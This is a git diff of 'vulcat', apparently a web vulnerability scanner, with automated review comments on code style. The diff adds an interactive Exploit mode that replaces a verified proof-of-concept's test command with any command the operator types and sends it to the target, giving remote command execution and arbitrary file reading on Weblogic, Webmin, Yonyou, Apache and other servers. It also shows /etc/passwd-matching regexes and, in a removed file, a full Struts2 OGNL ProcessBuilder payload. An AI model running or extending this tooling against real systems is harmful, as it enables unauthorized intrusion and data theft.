@@ -577,26 +642,31 @@ def list(): { 'vul_id': 'CVE-2014-4210', 'type': 'SSRF', + 'exp': '-', 'description': list_lang['Oracle Weblogic']['CVE-2014-4210'] }, { 'vul_id': 'CVE-2017-10271', 'type': 'unSerialize', + 'exp': '-', 'description': list_lang['Oracle Weblogic']['CVE-2017-10271'] }, { 'vul_id': 'CVE-2019-2725', 'type': 'unSerialize', + 'exp': '-', 'description': list_lang['Oracle Weblogic']['CVE-2019-2725'] }, { 'vul_id': 'CVE-2020-14750', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Oracle Weblogic']['CVE-2020-14750'] }, { 'vul_id': 'CVE-2020-14882', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Oracle Weblogic']['CVE-2020-14882'] } ], @@ -604,11 +674,13 @@ def list(): { 'vul_id': 'CVE-2019-15107', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Webmin']['CVE-2019-15107'] }, { 'vul_id': 'CVE-2019-15642', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Webmin']['CVE-2019-15642'] } ], @@ -616,26 +688,31 @@ def list(): { 'vul_id': 'CNNVD-201610-923', 'type': 'SQLinject', + 'exp': '-', 'description': list_lang['Yonyou']['CNNVD-201610-923'] }, { 'vul_id': 'CNVD-2021-30167', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Yonyou']['CNVD-2021-30167'] }, { 'vul_id': 'None', 'type': 'FileRead', + 'exp': '-', 'description': list_lang['Yonyou']['NCFindWeb'] }, { 'vul_id': 'None', 'type': 'DSinfo', + 'exp': '-', 'description': list_lang['Yonyou']['getSessionList.jsp'] }, { 'vul_id': 'None', 'type': 'SQLinject', + 'exp': '-', 'description': list_lang['Yonyou']['test.jsp'] } ] diff --git a/lib/initial/parse.py b/lib/initial/parse.py index d159fd4..b7b2d96 100644 --- a/lib/initial/parse.py +++ b/lib/initial/parse.py 
@@ -12,14 +12,14 @@ def parse(): ''' 参数列表 ''' lang = language() # * 帮助语言 - parser = OptionParser('''Usage: python3 vulcat.py + parser = OptionParser('\n' + lang['disclaimer'] + '''Usage: python3 vulcat.py Examples: python3 vulcat.py -u https://www.example.com/ python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3 python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615 python3 vulcat.py -f url.txt -t 10 python3 vulcat.py --list -''', version='vulcat.py-1.1.4\n') +''', version='vulcat.py-1.1.5\n') # * 指定目标 target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name']) target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url']) @@ -50,6 +50,7 @@ def parse(): application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name']) application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application']) application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln']) + application.add_option('-x', '--exp', dest='exp', action='store_true', help=lang['application_help']['exp']) # * 第三方api, 例如dnslog/ceye api = parser.add_option_group(lang['api_help']['title'], lang['api_help']['name']) diff --git a/lib/plugins/exploit.py b/lib/plugins/exploit.py new file mode 100644 index 0000000..374c933 --- /dev/null +++ b/lib/plugins/exploit.py 
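Review bot: The new `application.add_option('-x', '--exp', dest='exp', action='store_true', help=...)` sets no `default`, so `args.exp` is `None` rather than `False` when the flag is absent, unlike the sibling `-a`/`-v` options which all declare an explicit default. It works in the boolean checks downstream, but `default=False` keeps the parsed config typed as a bool and matches the file's convention: `application.add_option('-x', '--exp', dest='exp', action='store_true', default=False, help=lang['application_help']['exp'])`.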
@@ -0,0 +1,310 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + 将POC转换为EXP +''' + +from lib.initial.config import config +from lib.tool.logger import logger +from lib.report import output +from thirdparty import HackRequests +from urllib import parse as urllib_parse +import re +import socket + +class Exploit(): + def __init__(self): + self.lang = config.get('lang')['exploit'] + self.exp = config.get('exp') + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + self.proxy = config.get('proxy') + + self.rce_old_payload_re_list = [ # * RCE漏洞的旧command正则, 搜索并替换为用户自定义的新command + r'echo(\s|%20|\${IFS})?'\ + '([0-9a-z]){6,8}', + r'cat(\s|%20)?'\ + '(/|%2f|%2F)?'\ + 'etc/(/|%2f|%2F)?passwd', + r'phpinfo\(?\)?', + r'print(\(|%28)\d{3,6}\*\d{3,6}(\)|%29)', + ] + + self.fileread_old_payload_re_list = [ + r'(/|%2f|%252f|%2F|%252F)?'\ + 'etc(/|%2f|%252f|%2F|%252F)?passwd', + r'C:(/|%2f|%2F)?'\ + 'Windows(/|%2f|%2F)?'\ + 'System32(/|%2f|%2F)?'\ + 'drivers(/|%2f|%2F)?'\ + 'etc(/|%2f|%2F)?hosts', + r'C:(\\|%5c|%5C)?'\ + 'Windows(\\|%5c|%5C)?'\ + 'System32(\\|%5c|%5C)?'\ + 'drivers(\\|%5c|%5C)?'\ + 'etc(\\|%5c|%5C)?hosts', + ] + + def start(self, results): + ''' 启动exp + # * 1. 判断有无Request + search_requests() + Request -> self.exp_raw() -> HackRequests.httpraw() + + # * 2. 更新漏洞的Payload + search_command() + 接收用户输入的command + exit -> 退出Exploit模式 + 其它命令 -> 查找旧command + 查找失败 -> 退出Exploit模式 + 替换为新command -> 返回新的Request/Target + + # * 3. 使用新Payload请求, 判断Exp请求是否成功 + exp_request() + HackRequests.httpraw() / requests.get() + 请求失败 -> 返回第2步 + 请求成功 -> 返回请求结果res + + # * 4. 查找回显并显示 + search_response() + 有回显and查找成功 -> 显示回显 -> 返回第2步 + 查找失败 -> 返回第2步 + :param results(list): vulcat返回的多个poc扫描结果 + ''' + + # ! 
遍历poc结果, 判断单个poc结果的漏洞类型, 分发给相应的漏洞Exp + for result in results: + if result and (re.search(r'rce', str(result['Type']), re.I)): + self.exploit(result, self.rce_old_payload_re_list) + elif result and (re.search(r'file-?read', str(result['Type']), re.I)): + self.exploit(result, self.fileread_old_payload_re_list) + elif result and (re.search(r'file-?include', str(result['Type']), re.I)): + self.exploit(result, self.fileread_old_payload_re_list) + # self.fileinclude(result, self.fileinclude_old_payload_re_list) + # elif result and ('sqlinject' in str(result['Type']).lower()): + # self.rce(result) + # elif result and ('ssrf' in str(result['Type']).lower()): + # self.rce(result) + else: + logger.info('yellow_ex', self.lang['not_exp']) + + + def exploit(self, result, re_list): + ''' 漏洞通用Exploit + :param result(dict): vulcat的单个poc扫描结果 + ''' + logger.info('red_ex', self.lang['identify'].format(result['Type'][1])) + + http_raw = self.search_requests(result) # * 判断result是否带有Request请求包 + + if http_raw: + # * HackRequests.httpraw() + self.exp_raw(result, http_raw, re_list) + else: + logger.info('yellow_ex', self.lang['not_request']) # ? 
日志, 没有Request, 无法使用Exp + + def search_requests(self, result): + ''' 搜索一个result里面是否有返回Request + :param result(dict): vulcat的单个poc扫描结果 + :return: 一个str形式的http数据包 + ''' + + list_requests = [ + 'Request', + # 'Request-1', + # 'Request-2', + # 'Request-3', + ] + + for lr in list_requests: + if str(result.get(lr, '')): + res_info = output.output_vul_info(result, old_str='') # * 获取一个无颜色的http请求数据包 + raw_start = res_info.find('[Request') + len('[Request') + raw_end = res_info.rfind(']', raw_start) + http_raw = res_info[raw_start:raw_end] # * 截取[Request 数据包 ] + return http_raw + + return None + + def search_command(self, re_list, old_payload): + ''' 搜索一个Request/Target中的旧payload, 替换为新payload并返回新的Request/Target + :param re_list(list): 旧payload的正则列表 + :param old_payload(str): 要搜索的Request/Target + :return: + 新Request/Target + 是否退出exp模式 + vcsearch字符串 + ''' + new_command = '' + + # todo 输入自定义的命令, exit则退出Exploit模式 + while not new_command: + try: + logger.info('red', '[Exploit] ', print_end='') + logger.info('reset', self.lang['input_command'], notime=True, print_end='') # ? 日志, 请输入command + new_command = input() + + '''vulcat exp响应包内容搜索 (类似linux中的grep) + 可以搜索响应数据包中的内容, 正则表达式形式 + ''' + # todo 判断自定义命令中 是否有vulcat Exploit Response Search + vcsearch_re = r'\s*\|\s*vcsearch .*' + vc_str = re.search(vcsearch_re, new_command, re.I|re.M) + if vc_str: + vc_str = vc_str.group() + new_command = new_command.replace(vc_str, '') # * 去掉命令中的vcsearch语法 + + # * 只获取搜索的字符串 + vc_start = vc_str.index('vcsearch ') + len('vcsearch ') + vc_str = vc_str[vc_start:] + vc_str = vc_str.strip('\'').strip('"') + + if not new_command: + logger.info('yellow_ex', self.lang['not_command'], notime=True) # ? 
日志, command不能为空 + continue + elif new_command == 'exit': + return None, True, vc_str + except KeyboardInterrupt: + print() + return None, True, None + + # todo 将数据包中的Content-Length: xxx去掉, 否则会影响HackRequests + is_contentLength = re.search(r'Content-Length: \d{1,9999}\r?\n{1}', old_payload, re.I|re.M) + if is_contentLength: + old_payload = old_payload.replace(is_contentLength.group(0), '') + + + # todo 遍历正则列表, 查找旧的command, 替换为新的command并返回 + for rl in re_list: + is_command = re.search(rl, old_payload, re.M|re.S) + if is_command: + old_command = is_command.group(0) + if ('%20' in old_command): # * RCE的空格 + new_command = self.url_encode(new_command, 1) # * 1次url编码, 默认编码 + elif (re.search(r'(%2f|%2F)', old_command, re.M|re.S)): # * FileRead的/ + new_command = self.url_encode(new_command, 1, 'utf-8') # * 1次url编码, utf-8 + elif (re.search(r'(%252f|%252F)', old_command, re.M|re.S)): # * FileRead的/ + new_command = self.url_encode(new_command, 2, 'utf-8') # * 2次url编码, utf-8 + elif (re.search(r'\$\{IFS\}', old_command, re.M|re.S)): # * Nexus命令执行的空格 + new_command = new_command.replace(' ', '${IFS}') # * 替换空格为Linux下的${IFS} + + new_payload = old_payload.replace(old_command, new_command) + + return new_payload, False, vc_str + + logger.info('yellow_ex', self.lang['not_search_command']) + return None, True, vc_str + + def url_encode(self, src_str, num, code=None): + dst_str = src_str + + for i in range(num): + if code: + dst_str = urllib_parse.quote(dst_str, code) + else: + dst_str = urllib_parse.quote(dst_str) + + return dst_str + + def search_response(self, vc_str, res_response): + ''' 搜索一个Response里面是否有正确的回显 + :param res_re(str): 要查找的Response正则 + :param res_text(str): requests的响应包内容Response.text + :return: None + ''' + + try: + # * 是否使用vcsearch搜索Response.text的内容 + if not vc_str: + print('====================Response====================') + print(res_response) + print('====================Response====================') + else: + r = re.compile(vc_str, re.I|re.M|re.S) # * 根据用户输入的正则, 
新建一个正则对象r + vc_text_list = r.findall(res_response) # * 使用正则对象r, 匹配Response.text中的内容 + + if vc_text_list: + print('====================Response-vcsearch====================') + for vc_text in vc_text_list: + print(vc_text, end='\n\n') + print('====================Response-vcsearch====================') + else: + print(self.lang['not_response']) # ? 日志, 没有匹配到响应内容 + except re.error: + print(self.lang['re_error']) # ? 日志, 正则表达式输入有误 + + def exp_request(self, result, http_raw, is_ssl=False): + ''' 通用请求 + :param result(dict): vulcat的单个poc扫描结果 + :param http_raw(str): poc返回的http请求包 + :is_ssl: http请求包是否使用HTTPS + True -> HTTPS + False -> HTTP + :return: requests.Request + ''' + vul_info = {} + vul_info['app_name'] = result['Type'][0] + '(Exploit)' + vul_info['vul_type'] = 'Exploit-' + result['Type'][1] + vul_info['vul_id'] = result['Type'][2] + + if 'https' in result['Target']: + is_ssl = True + + try: + hack = HackRequests.hackRequests() + + res = hack.httpraw( + http_raw, + ssl=is_ssl, + proxy=self.proxy, + location=False + ) + + res.method = 'Exploit' + logger.logging(vul_info, res.status_code, res) # * LOG + + return res + except socket.timeout: + logger.logging(vul_info, 'Timeout') + return None + except ConnectionRefusedError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + def exp_raw(self, result, http_raw, re_list): + ''' 使用http数据包(Request)进行exp + while + if is_exit 是否退出Exploit模式 + if new_http_raw 是否成功更新了payload + 是 -> 发起请求 + 否 -> 更新payload失败 + if res 是否请求成功 + 是 -> 查找/显示Response内容 + 否 -> exp请求失败 + + :param result: vulcat返回的单个poc扫描结果 + :param http_raw: HTTP请求数据包 + ''' + while True: + new_http_raw, is_exit, vc_str = self.search_command(re_list, http_raw) + + if is_exit: + logger.info('cyan_ex', self.lang['exit']) # ? 
日志, 退出Exp模式 + break + + if new_http_raw: + res = self.exp_request(result, new_http_raw) + + if res: + self.search_response(vc_str, str(res.header) + res.text()) + else: + logger.info('red', self.lang['exp_faild']) # ? 日志, exp请求失败 + else: + logger.info('red_ex', self.lang['faild_command']) # ? 日志, 更新payload失败 + +exploit = Exploit() \ No newline at end of file diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py index 60ea11a..d830fbe 100644 --- a/lib/plugins/fingerprint/webapp.py +++ b/lib/plugins/fingerprint/webapp.py @@ -549,6 +549,16 @@ def __init__(self): r'"timestamp":.*"status":404', ] }, + { + 'name': 'supervisor', + 'path': '', + 'data': '', + 'fingerprint': [ + r'Supervisor \d\.\d\.\d' + ] + }, { 'name': 'thinkphp', 'path': '', diff --git a/lib/report/output.py b/lib/report/output.py index d5016b0..be4c819 100644 --- a/lib/report/output.py +++ b/lib/report/output.py @@ -7,19 +7,14 @@ from lib.tool.logger import logger from thirdparty import requests from thirdparty import HackRequests -# from lib.plugins.Exp import exp import json import http.client def output_info(results, lang): - # cmd = config.get('command') - logger.info('cyan_ex', lang['output']['info']['wait']) # ? 日志, 正在处理扫描结果 results_info_list = [] for result in results: - # if (result and cmd): - # exp(result) if result: results_info = '' results_info += output_vul_info_color(result) @@ -135,8 +130,11 @@ def output_vul_info_color(result): return result_info -def output_vul_info(result): - ''' 漏洞信息, 无颜色, 用于保存结果至文件中 ''' +def output_vul_info(result, old_str='\n'): + ''' 漏洞信息, 无颜色, 用于保存结果至文件中 + :param result: vulcat的单个poc扫描结果 + :param old_str: 适配Exploit模式, 其它情况下不用理会 + ''' result_info = '\n' for key, value in result.items(): value_type = type(value) 
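Review bot: In `url_encode`, `urllib_parse.quote(dst_str, code)` passes `code` as quote's second positional parameter, which is `safe`, not `encoding`; with `'utf-8'` it only behaves as intended because that string happens not to contain `/`, so `/` is percent-encoded by accident while the encoding argument is never actually set. Make the intent explicit with `dst_str = urllib_parse.quote(dst_str, safe='', encoding=code)` and give the helper a docstring stating that `num` is the number of encoding passes. Separately, the bare `except:` at the end of `exp_request` also catches `KeyboardInterrupt`, so Ctrl-C during a slow request is logged as `'Error'` instead of reaching the interrupt handling that `search_command` provides; `except Exception:` keeps that path working. The hunk is the whole new file, so every method is fully visible.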
@@ -153,7 +151,7 @@ def output_vul_info(result): result_info += output_res(key, value, iscolor=False) elif value_type == HackRequests.response: - result_info += output_Hackres(key, value, iscolor=False) + result_info += output_Hackres(key, value, iscolor=False, old_str=old_str) return result_info @@ -258,8 +256,14 @@ def output_res(key, res, iscolor=True): return info_res -def output_Hackres(key, res, iscolor=True): - ''' 接收一个HackRequests结果, 返回一个http数据包 ''' +def output_Hackres(key, res, iscolor=True, old_str='\n'): + ''' 接收一个HackRequests结果, 返回一个http数据包 + :param key: 字典key值 + :param res: HackRequests.Response + :param iscolor: 颜色 + :param rep: 用来适配Exploit模式, exp不能使用带换行的 + :return: 带颜色/无颜色的http请求数据包 + ''' info_res = '' if iscolor: @@ -276,7 +280,7 @@ def output_Hackres(key, res, iscolor=True): try: info_res += key + ':' info_res += ' [Request' - info_res += '\n' + res.log.get('request').replace('\n', '') + info_res += '\n' + res.log.get('request').replace(old_str, '') info_res += ']\n ' except: diff --git a/lib/tool/logger.py b/lib/tool/logger.py index bf12b95..21b639a 100644 --- a/lib/tool/logger.py +++ b/lib/tool/logger.py @@ -12,8 +12,15 @@ def __init__(self): self.requests_number = 0 # * http请求计数 def info(self, text_color, text, notime=False, print_end='\n'): + ''' 输出日志信息 + :param text_color: 文本颜色 + :param text: 文本 + :param notime: 不显示时间[xx:xx:xx] + :param print_end: 结尾字符 + ''' + text = text.replace('\\', '\\\\') # * 防止eval时字符被转义 - command = 'color.{}("{}")'.format(text_color, text) # * 颜色 + 文字 + command = 'color.{}("""{}""")'.format(text_color, text) # * 颜色 + 文字 now_time = '' if notime else nowtime() # * 是否显示时间 tqdm.write(now_time + eval(command), end=print_end) 
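Review bot: The new docstring on `output_Hackres` documents a parameter `rep` that does not exist; the added parameter is `old_str`, and the body uses it as the substring removed from the logged request via `.replace(old_str, '')`. Replace that line with `:param old_str: substring stripped from the logged request (default '\n'; Exploit mode passes '' so line breaks are kept)`, and the `output_vul_info` docstring in the earlier hunk would benefit from the same wording instead of "适配Exploit模式". Both functions continue outside their hunks.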
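Review bot: `logger.info` still builds Python source from `text` and runs it through `eval`; the added `text.replace('\\', '\\\\')` and the switch to triple quotes only narrow the problem, and a message containing `"""` or other quote sequences will still either break out of the literal or raise `SyntaxError` at log time, which matters for any caller that passes text it did not author. The dispatch does not need `eval` at all: replace the `text = ...`, `command = ...` and `tqdm.write(...)` lines with `tqdm.write(now_time + getattr(color, text_color)(text), end=print_end)`, which selects the colour function by name and passes `text` as a plain argument. The rest of the `logger` class is outside this hunk.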
@@ -32,14 +39,19 @@ def logging_0(self, *args): pass def logging_1(self, *args): - ''' 功能尚未完成, 还在写 ''' + ''' 默认为1, 正常输出信息 ''' pass def logging_2(self, vul_info, status_code, *args): ''' 日志2级, 框架名称+状态码+漏洞编号''' - info_2 = color.red_ex('[LOG-{}-{}]'.format(str(self.requests_number), vul_info['app_name'])) - info_2 += color.red_ex(' [') + color.magenta_ex(str(status_code)) + color.red_ex(']') - info_2 += color.red_ex(' [') + color.black_ex(vul_info['vul_id']) + color.red_ex(']') + info_2 = '' + + try: + info_2 = color.red_ex('[LOG-{}-{}]'.format(str(self.requests_number), vul_info['app_name'])) + info_2 += color.red_ex(' [') + color.magenta_ex(str(status_code)) + color.red_ex(']') + info_2 += color.red_ex(' [') + color.black_ex(vul_info['vul_id']) + color.red_ex(']') + except: + return info_2 return info_2 @@ -49,9 +61,9 @@ def logging_3(self, vul_info, status_code, res): try: # * HackRequests - if (str(type(res)) == ""): + if ('HackRequests.response' in str(type(res))): info_3 += color.red_ex(' [' + res.method + ' ') - info_3 +=color.black_ex(res.url) + color.red_ex(']') + info_3 += color.black_ex(res.url.replace('\r', '')) + color.red_ex(']') if vul_info['data']: info_3 += color.red_ex(' [DATA ') + color.black_ex(vul_info['data']) + color.red_ex(']') return info_3 @@ -72,7 +84,7 @@ def logging_4(self, vul_info, status_code, res): try: # * HackRequests - if (str(type(res)) == ""): + if ('HackRequests.response' in str(type(res))): info_4 += color.red_ex(' [Request') info_4 += color.black_ex('\n' + res.log.get('request')) 
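Review bot: The `try`/`except` wrapped around the three `info_2` lines in `logging_2` uses a bare `except:` and returns an empty string, which hides the only plausible failure here (a missing `app_name` or `vul_id` key in `vul_info`) and would also swallow `KeyboardInterrupt` mid-scan. Narrow it to `except KeyError:` so the fallback applies only to incomplete `vul_info` dicts, and consider noting in the docstring that an empty string is returned in that case. The caller that consumes `info_2` is outside the hunk.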
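Review bot: The replacement check `'HackRequests.response' in str(type(res))` in `logging_3` tests the type's printed name with a substring match, so any class whose module or name happens to contain that text passes, and a rename of the class silently flips every log level to the `requests` branch. If `logger.py` can import `HackRequests` (its import block is not in this diff), `isinstance(res, HackRequests.response)` states the intent directly; the same substring test is repeated in the `logging_4` hunk below and in the `logging_6` hunk on the next line. The `logging_3` and `logging_4` bodies continue outside their hunks.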
@@ -115,18 +127,18 @@ def logging_5(self, vul_info, status_code, res): def logging_6(self, vul_info, status_code, res): ''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 ''' - res.encoding = 'utf-8' info_6 = self.logging_5(vul_info, status_code, res) try: # * HackRequests - if (str(type(res)) == ""): + if ('HackRequests.response' in str(type(res))): info_6 = info_6[:-1] info_6 += color.black_ex('\n\n' + res.text()) info_6 += color.red_ex('\n]') # * requests else: + res.encoding = 'utf-8' info_6 = info_6[:-1] info_6 += color.black_ex('\n\n' + res.text) diff --git a/lib/tool/md5.py b/lib/tool/md5.py index df7fe96..de74319 100644 --- a/lib/tool/md5.py +++ b/lib/tool/md5.py @@ -2,8 +2,7 @@ # -*- coding:utf-8 -*- ''' - 获取md5值, 取前6位 - 获取随机的md5值, 取前8位 + md5 ''' import hashlib @@ -23,14 +22,43 @@ def random_md5(): return md.hexdigest()[:8] -def random_int_1(): - ''' 返回1个随机整数, 范围1234-5678 ''' - num1 = random.randint(1234, 5678) +def random_int_1(len = 4): + ''' 返回1个随机整数, 默认范围1234-5678 + @param len + 随机数长度, 默认为4, 最小为1, 最大为6 + 范围 + 1-9 + 10-99 + 100-999 + 1234-5678 + 12345-56789 + 123456-567890 + ''' + + num_list_1 = [0, 1, 10, 100, 1234, 12345, 123456] + num_list_2 = [0, 9, 99, 999, 5678, 56789, 567890] + + num1 = random.randint(num_list_1[len], num_list_2[len]) + return num1 -def random_int_2(): - ''' 返回2个随机整数, 范围1234-5678 ''' - num1 = random.randint(1234, 5678) - num2 = random.randint(1234, 5678) +def random_int_2(len = 4): + ''' 返回2个随机整数, 默认范围1234-5678 + @param len + 随机数长度, 默认为4, 最小为1, 最大为6 + 范围 + 1-9 + 10-99 + 100-999 + 1234-5678 + 12345-56789 + 123456-567890 + ''' + + num_list_1 = [0, 1, 10, 100, 1234, 12345, 123456] + num_list_2 = [0, 9, 99, 999, 5678, 56789, 567890] + + num1 = random.randint(num_list_1[len], num_list_2[len]) + num2 = random.randint(num_list_1[len], num_list_2[len]) return num1, num2 \ No newline at end of file diff --git a/payloads/ApacheAirflow.py b/payloads/ApacheAirflow.py index f951a70..a7e2aab 100644 --- a/payloads/ApacheAirflow.py 
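Review bot: `random_int_1(len = 4)` and `random_int_2(len = 4)` shadow the builtin `len` and never validate the argument, although the docstring promises a range of 1–6: `len=0` returns `0` from `randint(0, 0)`, and anything above 6 raises `IndexError` from the lookup tables rather than a meaningful error. Add `if not 1 <= len <= 6: raise ValueError('len must be between 1 and 6')` before the table lookup in both functions (renaming the parameter would break any caller passing it by keyword), and let `random_int_2` return `random_int_1(len), random_int_1(len)` instead of duplicating the two tables. Both functions are fully contained in the hunk.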
+++ b/payloads/ApacheAirflow.py @@ -130,7 +130,10 @@ def cve_2020_17526_scan(self, url): logger.logging(vul_info, 'Error') return None - if ((verify_res.status_code == 200) and (('Schedule' in verify_res.text) or ('Recent Tasks' in verify_res.text))): + if ((verify_res.status_code == 200) + and (('Schedule' in verify_res.text) + or ('Recent Tasks' in verify_res.text)) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], diff --git a/payloads/ApacheFlink.py b/payloads/ApacheFlink.py index db6f4b7..f0b3dc7 100644 --- a/payloads/ApacheFlink.py +++ b/payloads/ApacheFlink.py @@ -15,6 +15,7 @@ from lib.tool.thread import thread from lib.tool import check from thirdparty import requests +import re class Flink(): def __init__(self): @@ -79,7 +80,10 @@ def cve_2020_17519_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)): + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -87,7 +91,8 @@ def cve_2020_17519_scan(self, url): 'Method': vul_info['vul_method'], 'Url': url, 'Path': path - } + }, + 'Request': res } return results diff --git a/payloads/ApacheHttpd.py b/payloads/ApacheHttpd.py index 97a33b1..0ba0dd7 100644 --- a/payloads/ApacheHttpd.py +++ b/payloads/ApacheHttpd.py @@ -31,6 +31,7 @@ from thirdparty import requests from thirdparty import HackRequests from time import sleep +import re class ApacheHttpd(): def __init__(self): 
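Review bot: In the `cve_2020_17519_scan` hunk the new regex `root:(x{1}|.*):\d{1,7}:\d{1,7}:root` is compiled with `re.S`, so `(x{1}|.*)` collapses to `.*` and may span any amount of intervening text, including newlines, between `root:` and `:N:N:root`; this is looser than the fixed substrings it replaces and raises the false-positive rate on pages that merely mention `root:`. Anchoring the match to one passwd line, e.g. `r'^root:[^:\n]*:\d{1,7}:\d{1,7}:root'` with `re.I|re.M`, keeps the detection on a single record. The same pattern is used in the two ApacheHttpd hunks on the next line and in the ApacheSolr hunk after that, and the fix applies to all four. The scan functions continue outside their hunks.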
@@ -173,7 +174,7 @@ def cve_2021_41773_scan(self, url): ''' vul_info = {} vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'FileRead/RCE' + vul_info['vul_type'] = 'RCE/FileRead' vul_info['vul_id'] = 'CVE-2021-41773' # vul_info['vul_method'] = 'GET/POST' vul_info['headers'] = {} @@ -225,10 +226,9 @@ def cve_2021_41773_scan(self, url): return None if ((self.md in check.check_res(res.text, self.md)) - or ('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, @@ -241,7 +241,7 @@ def cve_2021_42013_scan(self, url): ''' CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/ ''' vul_info = {} vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'FileRead/RCE' + vul_info['vul_type'] = 'RCE/FileRead' vul_info['vul_id'] = 'CVE-2021-42013' # vul_info['vul_method'] = 'GET/POST' vul_info['headers'] = {} @@ -289,10 +289,9 @@ def cve_2021_42013_scan(self, url): return None if ((self.md in check.check_res(res.text(), self.md)) - or ('/sbin/nologin' in res.text()) - or ('root:x:0:0:root' in res.text()) - or ('Microsoft Corp' in res.text()) - or ('Microsoft TCP/IP for Windows' in res.text()) + or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text(), re.I|re.M|re.S) + or (('Microsoft Corp' in res.text()) + and ('Microsoft TCP/IP for Windows' in res.text())) ): results = { 'Target': target, diff --git a/payloads/ApacheSolr.py b/payloads/ApacheSolr.py index 08a3f58..fa858fd 100644 --- a/payloads/ApacheSolr.py +++ b/payloads/ApacheSolr.py 
@@ -162,7 +162,7 @@ def cve_2021_27905_scan(self, url): ''' 当Solr不启用身份验证时, 攻击者可以直接制造请求以启用特定配置, 最终导致SSRF或任意文件读取 ''' vul_info = {} vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'SSRF' + vul_info['vul_type'] = 'SSRF/FileRead' vul_info['vul_id'] = 'CVE-2021-27905' vul_info['vul_method'] = 'GET/POST' vul_info['headers'] = { @@ -206,11 +206,14 @@ def cve_2021_27905_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)): + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results diff --git a/payloads/ApacheStruts2.py b/payloads/ApacheStruts2.py deleted file mode 100644 index 5f2e752..0000000 --- a/payloads/ApacheStruts2.py +++ /dev/null 
@@ -1,445 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - ApacheStruts2扫描类: - Struts2 远程代码执行 - S2-001 - Payload: https://vulhub.org/#/environments/struts2/s2-001/ - S2-005 - Payload: https://blog.csdn.net/mole_exp/article/details/122550317 - S2-007 - Payload: https://vulhub.org/#/environments/struts2/s2-007/ - S2-008 - Payload: https://www.cnblogs.com/peace-and-romance/p/15630627.html - S2-009 - Payload: https://www.cnblogs.com/Feng-L/p/13644828.html - S2-012(CVE-2013-1965) - Payload: - - S2-059 - Payload: https://www.h5w3.com/199714.html -file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts -''' - -from lib.initial.config import config -from lib.tool.md5 import md5 -from lib.tool.logger import logger -from lib.tool.thread import thread -from lib.tool import check -from thirdparty import requests - -class Struts2(): - def __init__(self): - self.timeout = config.get('timeout') - self.headers = config.get('headers') - self.proxies = config.get('proxies') - - self.app_name = 'ApacheStruts2' - self.md = md5(self.app_name) - self.cmd = 'echo ' + self.md - - self.s2_001_payloads = [ - { - 'path': 'login.action', - 'data': 'username=admin&password=%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%20%22{}%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D'.format(self.md) - }, - { - 'path': '', - 'data': 
